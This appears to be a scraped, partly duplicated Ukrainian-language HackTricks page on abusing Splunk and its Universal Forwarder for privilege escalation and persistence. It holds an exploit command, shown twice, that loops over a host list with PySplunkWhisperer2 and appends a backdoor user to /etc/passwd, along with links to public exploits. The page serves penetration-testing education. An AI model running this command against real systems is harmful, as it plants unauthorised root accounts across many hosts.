Splunk LPE and Persistence

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

Якщо ви перераховуєте машину всередині або ззовні і знаходите запущений Splunk (порт 8090), якщо вам пощастить знати будь-які дійсні облікові дані, ви можете зловживати сервісом Splunk для виконання оболонки від імені користувача, що запускає Splunk. Якщо його запускає root, ви можете підвищити привілеї до root.

Також, якщо ви вже root і сервіс Splunk не слухає лише на localhost, ви можете вкрасти файл паролів з сервісу Splunk і зламати паролі або додати нові облікові дані до нього. І підтримувати постійність на хості.

На першому зображенні нижче ви можете побачити, як виглядає веб-сторінка Splunkd.

Резюме експлуатації агента Splunk Universal Forwarder

Для отримання додаткових деталей перевірте пост https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. Це лише резюме:

Огляд експлуатації: Експлуатація, що націлюється на агента Splunk Universal Forwarder (UF), дозволяє зловмисникам з паролем агента виконувати довільний код на системах, що запускають агента, потенційно компрометуючи всю мережу.

Ключові моменти:

Агент UF не перевіряє вхідні з'єднання або автентичність коду, що робить його вразливим до несанкціонованого виконання коду.
Загальні методи отримання паролів включають їх знаходження в мережевих каталогах, файлових спільних ресурсах або внутрішній документації.
Успішна експлуатація може призвести до доступу на рівні SYSTEM або root на скомпрометованих хостах, ексфільтрації даних та подальшого проникнення в мережу.

Виконання експлуатації:

Зловмисник отримує пароль агента UF.
Використовує API Splunk для надсилання команд або скриптів агентам.
Можливі дії включають витяг файлів, маніпуляцію обліковими записами користувачів та компрометацію системи.

Вплив:

Повна компрометація мережі з правами SYSTEM/root на кожному хості.
Потенціал для відключення ведення журналів, щоб уникнути виявлення.
Встановлення бекдорів або програм-вимагачів.

Приклад команди для експлуатації:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Використовувані публічні експлойти:

https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
https://www.exploit-db.com/exploits/46238
https://www.exploit-db.com/exploits/46487

Зловживання запитами Splunk

Для отримання додаткової інформації перегляньте пост https://blog.hrncirik.net/cve-2023-46214-analysis

Підтримати HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

PreviousSocket Command Injection NextSSH Forward Agent exploitation

Last updated 3 months ago

Резюме експлуатації агента Splunk Universal Forwarder

Ключові моменти:

Агент UF не перевіряє вхідні з'єднання або автентичність коду, що робить його вразливим до несанкціонованого виконання коду.

Загальні методи отримання паролів включають їх знаходження в мережевих каталогах, файлових спільних ресурсах або внутрішній документації.

Успішна експлуатація може призвести до доступу на рівні SYSTEM або root на скомпрометованих хостах, ексфільтрації даних та подальшого проникнення в мережу.

Виконання експлуатації:

Зловмисник отримує пароль агента UF.

Використовує API Splunk для надсилання команд або скриптів агентам.

Можливі дії включають витяг файлів, маніпуляцію обліковими записами користувачів та компрометацію системи.

Вплив:

Повна компрометація мережі з правами SYSTEM/root на кожному хості.

Потенціал для відключення ведення журналів, щоб уникнути виявлення.

Встановлення бекдорів або програм-вимагачів.

Приклад команди для експлуатації:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

Використовувані публічні експлойти:

https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2

https://www.exploit-db.com/exploits/46238

https://www.exploit-db.com/exploits/46487

Зловживання запитами Splunk

Для отримання додаткової інформації перегляньте пост https://blog.hrncirik.net/cve-2023-46214-analysis

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримати HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.